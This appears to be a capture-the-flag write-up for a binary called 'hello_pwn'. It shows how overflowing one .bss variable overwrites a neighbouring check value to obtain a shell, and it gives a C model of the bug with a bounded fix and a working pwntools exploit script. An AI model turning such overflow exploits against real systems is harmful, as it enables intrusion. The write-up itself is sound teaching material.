Starting to blog
0x00 Foreword
The file and checksec output is omitted; it is a 64-bit ELF binary.
0x10 steps
0x11 main function
In the main function we can see that the program reads our input into unk_601068. To get a shell, dword_60106C must hold the value 1853186401 when it is checked.
0x12 bss segment observation
From the addresses of these two variables you can see that they sit only 4 bytes apart in .bss. So when the program reads our input into unk_601068, we can send 4 bytes of filler to fill that slot and then the packed value 1853186401, which lands on dword_60106C. The payload is therefore `payload = b'a' * 4 + p64(1853186401)`.
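To show why the adjacency matters, here is an added C model of the bug (not the challenge's source): two 4-byte globals laid out back to back, a read that is bounded by the request size rather than the destination size, and the fixed version beside it. The names `bss`, `vuln_read` and `safe_read` are hypothetical; the payload bytes are the writeup's `'a'*4 + p64(1853186401)` constructed inline.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Model of the writeup's .bss: bytes 0..3 stand in for unk_601068 (the input
   slot) and bytes 4..7 for dword_60106C (the value checked before the shell).
   Hypothetical layout, chosen to mirror the 4-byte gap seen in the binary. */
static uint8_t bss[8];

#define INPUT_OFF 0
#define FLAG_OFF  4
#define TARGET    1853186401u  /* value main() compares dword_60106C against */

/* Read the 4-byte flag that lives right after the input slot. */
static uint32_t read_flag(void) {
    uint32_t v;
    memcpy(&v, bss + FLAG_OFF, sizeof v);
    return v;
}

/* Vulnerable pattern: the copy length is capped by how much the caller
   sends (up to 16 bytes), not by the 4-byte destination, so bytes 4..7 of
   the input overwrite the neighbouring global. Returns the resulting flag. */
uint32_t vuln_read(const uint8_t *data, size_t len) {
    memset(bss, 0, sizeof bss);
    memcpy(bss + INPUT_OFF, data, len > 16 ? 16 : len);
    return read_flag();
}

/* Hardened pattern: the copy is bounded by the destination field's size,
   so extra input bytes are dropped and the neighbour stays untouched. */
uint32_t safe_read(const uint8_t *data, size_t len) {
    memset(bss, 0, sizeof bss);
    memcpy(bss + INPUT_OFF, data, len > 4 ? 4 : len);
    return read_flag();
}

/* Constructed input equal to the writeup's payload: four 'a' filler bytes,
   then 1853186401 as a little-endian 8-byte value (p64). */
const uint8_t PAYLOAD[12] = {
    'a', 'a', 'a', 'a',
    0x61, 0x61, 0x75, 0x6e, 0x00, 0x00, 0x00, 0x00
};
```

With the unbounded copy the flag becomes exactly 1853186401 (0x6e756161, the bytes "aaun" read little-endian); with the bounded copy it stays 0.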
0x20 exp
```python
from pwn import *

sh = process("./hello_pwn")

# 4 bytes fill unk_601068, the packed value lands on dword_60106C
payload = b'a' * 4 + p64(1853186401)

sh.recvuntil(b"bof")
sh.sendline(payload)
sh.interactive()
```